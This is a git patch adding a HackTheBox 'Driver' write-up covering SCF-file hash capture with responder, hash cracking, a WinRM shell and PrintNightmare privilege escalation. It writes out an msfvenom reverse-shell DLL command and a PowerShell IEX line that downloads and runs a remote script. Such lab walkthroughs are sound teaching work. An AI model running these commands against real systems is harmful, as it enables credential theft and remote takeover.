From 5d2a04ae9a88c3583c97a4a89c65da6c89c347ef Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sat, 26 Feb 2022 19:54:05 +0500
Subject: [PATCH] Create Driver.md
---
HackTheBox/Driver.md | 154 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 154 insertions(+)
create mode 100644 HackTheBox/Driver.md
diff --git a/HackTheBox/Driver.md b/HackTheBox/Driver.md
new file mode 100644
index 0000000..e99584d
--- /dev/null
+++ b/HackTheBox/Driver.md
@@ -0,0 +1,154 @@
+# HackTheBox-Driver
+
+## NMAP
+
+```bash
+PORT STATE SERVICE REASON VERSION
+80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
+| http-auth:
+| HTTP/1.1 401 Unauthorized\x0D
+|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
+| http-methods:
+| Supported Methods: OPTIONS TRACE GET HEAD POST
+|_ Potentially risky methods: TRACE
+|_http-server-header: Microsoft-IIS/10.0
+|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
+5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+```
+
+## PORT 139/445 (SMB)
+
+
+
+Checking smb share through anonymous login it seems we don't have access it to it so let's move on to web server
+
+## PORT 80 (HTTP)
+
+
+
+On visiting web server , it's going to ask credentials so let's try `admin;admin` to see if this works
+
+
+
+And it did it ,so let's see what we have here
+
+
+
+It's running on php , I checked to include index file with `php` extension and this loaded the page so this page is written on php so just some basic enumeration here. There are only two pages here , the other page is about uploading a firmware for the printer
+
+
+
+I tried uploading something but it doesn't seem that I can access that file from anywhere so I ran `gobuster` and it also didn't found anyhing interesting
+
+
+
+Now I kept thinking but nothing was coming to my mind until I focused on these lines " upload the respective firmware update to our file share" , so maybe the file we upload here is going to smb share , so here I learned a new attack which is known as SCF File attack `Shell Command File`.
+
+So we need to create a `.scf` file , it will look like this
+
+
+
+Now we will have to upload this file and at the same time run `responder` to catch NTMLv2 hash
+
+```bash
+responder -I tun0 -rdw -v
+```
+
+
+
+Just copy any of the hash , they all are the same, the only different is the time difference (in seconds) and save the hash in a file , and crack it with `hashcat`
+
+
+
+
+
+Now to verify if we have valid creds , we can use `crackmapexec` to verify it on smb
+
+
+
+
+
+We only have read access here so we can't get a shell using `smbexec` or `psexec`. Since WinRM is open (port 5985) , we can check if we can get a shell with that
+
+
+
+It's showing us the status "pwned" meaning that we can get a shell
+
+
+
+## Privilege Escalation (Print Nightmare Python)
+
+Assuming from the web page that there's a print spooler service running , we can test if we can exploit `PrintNightmare` , now this requires some setup as we need to clone the specifc impacket repo
+
+https://github.com/cube0x0/CVE-2021-1675
+
+After cloning it we would then have to run `python3 ./setup.py install` and copy the contents of `CVE-2021-1675.py` , start the smb server using `service smbd restart` and generate a dll reverse shell
+
+```bash
+msfvenom x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll
+```
+
+Make sure that you have made read access to other group for this file
+
+
+
+
+
+Now to lauch the script and catch the shell
+
+
+
+
+
+
+## Print Nightmare (Powershell)
+
+We can achieve SYSTEM on this machine through powershell as well , without the need of setting up a smb server
+
+So we'll use this POC for the pring nightmare exploit
+
+https://github.com/calebstewart/CVE-2021-1675
+
+
+
+After transferring it to target machine , let's import the ps1 file. But if we try to import the script , it's going to show us an error "running scripts is disabled on this system"
+
+
+
+So to bypass this , we need to download the file using `IEX`
+
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
+```
+
+
+
+An advantage of downloading it this way is that not only it downloads the file but it will actually import the script so we don't have to import it manually
+
+```powershell
+Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"
+```
+
+
+
+We can see that the user has been created
+
+
+
+And we can then just switch to this user by logging in with `evil-winrm`
+
+
+
+## References
+
+- https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
+- https://www.jaacostan.com/2021/07/printnightmare-cve-2021-1675-poc.html
+- https://github.com/cube0x0/CVE-2021-1675
+- https://github.com/calebstewart/CVE-2021-1675
+- https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70